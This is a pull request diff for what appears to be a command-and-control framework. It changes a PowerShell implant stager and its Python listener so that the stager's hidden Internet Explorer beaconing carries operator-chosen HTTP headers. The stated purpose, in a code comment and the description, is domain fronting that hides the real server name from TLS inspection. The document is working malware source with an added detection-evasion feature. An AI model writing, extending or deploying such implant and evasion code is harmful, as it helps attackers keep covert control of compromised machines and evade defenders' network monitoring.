### PR TITLE
Add custom HTTP headers to ie_com listener

### DIFF
--- a/data/agent/stagers/http_com.ps1
+++ b/data/agent/stagers/http_com.ps1
@@ -58,7 +58,7 @@ function Start-Negotiate {
     # try to ignore all errors
     $ErrorActionPreference = "SilentlyContinue";
     $e=[System.Text.Encoding]::ASCII;
-
+    $customHeaders = "";
     $SKB=$e.GetBytes($SK);
     # set up the AES/HMAC crypto
     # $SK -> staging key for this server
@@ -99,6 +99,15 @@ function Start-Negotiate {
         $ie.Silent = $True;
         $IE.visible = $False;
     }
+
+    if ($customHeaders -ne "") {
+        #If host header defined, assume domain fronting is in use and add a call to the base URL first
+	    #this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
+        if ($customHeaders.Contains("Host: ")) {
+                $IE.navigate2($s,14,0,$Null,$Null);
+                while($ie.busy -eq $true){Start-Sleep -Milliseconds 100};
+        }
+    }
     
     # RC4 routing packet:
     #   sessionID = $ID
@@ -113,7 +122,7 @@ function Start-Negotiate {
 
     # step 3 of negotiation -> client posts AESstaging(PublicKey) to the server
     $bytes=$e.GetBytes([System.Convert]::ToBase64String($rc4p));
-    $IE.navigate2($s+"/index.jsp", 14, 0, $bytes, $Null);
+    $IE.navigate2($s+"/index.jsp", 14, 0, $bytes, $customHeaders);
     while($ie.busy -eq $true){Start-Sleep -Milliseconds 100};
     $html = $IE.document.GetType().InvokeMember("body", [System.Reflection.BindingFlags]::GetProperty, $Null, $IE.document, $Null).InnerHtml;
 
@@ -183,7 +192,7 @@ function Start-Negotiate {
     $rc4p2 = $IV2 + $rc4p2 + $eb2;
 
     $bytes=$e.GetBytes([System.Convert]::ToBase64String($rc4p2));
-    $IE.navigate2($s+"/index.php", 14, 0, $bytes, $Null);
+    $IE.navigate2($s+"/index.php", 14, 0, $bytes, $customHeaders);
     while($ie.busy -eq $true){Start-Sleep -Milliseconds 100};
     $html = $IE.document.GetType().InvokeMember("body", [System.Reflection.BindingFlags]::GetProperty, $Null, $IE.document, $Null).InnerHtml;
     try {

--- a/lib/listeners/http_com.py
+++ b/lib/listeners/http_com.py
@@ -303,6 +303,7 @@ class Listener:
         stagingKey = listenerOptions['StagingKey']['Value']
         host = listenerOptions['Host']['Value']
         workingHours = listenerOptions['WorkingHours']['Value']
+        customHeaders = profile.split('|')[2:]
         
         # select some random URIs for staging from the main profile
         stage1 = random.choice(uris)
@@ -318,6 +319,22 @@ class Listener:
             # make sure the server ends with "/"
             if not host.endswith("/"):
                 host += "/"
+
+            #Patch in custom Headers
+            headers = ""
+            if customHeaders != []:
+                crlf = False
+                for header in customHeaders:
+                    headerKey = header.split(':')[0]
+                    headerValue = header.split(':')[1]
+
+                    # Host header TLS SNI logic done within http_com.ps1
+                    if crlf:
+                        headers += "`r`n"
+                    else:
+                        crlf = True
+                    headers += "%s: %s" % (headerKey, headerValue)
+                stager = stager.replace("$customHeaders = \"\";","$customHeaders = \""+headers+"\";")
 
             # patch the server and key information
             stager = stager.replace('REPLACE_SERVER', host)


### PR DESCRIPTION
Enhances the "ie_com" listener to be able to use custom HTTP headers similar to the "http" listener. Also added the option for end user to choose which HTTP header will contain the routing cookie, in the past it was "CF-RAY". Users can now choose a custom HTTP request header to store the routing cookie, but "CF-RAY" is still the default.

The intent of these changes is to allow domain fronting for the "ie_com" listener.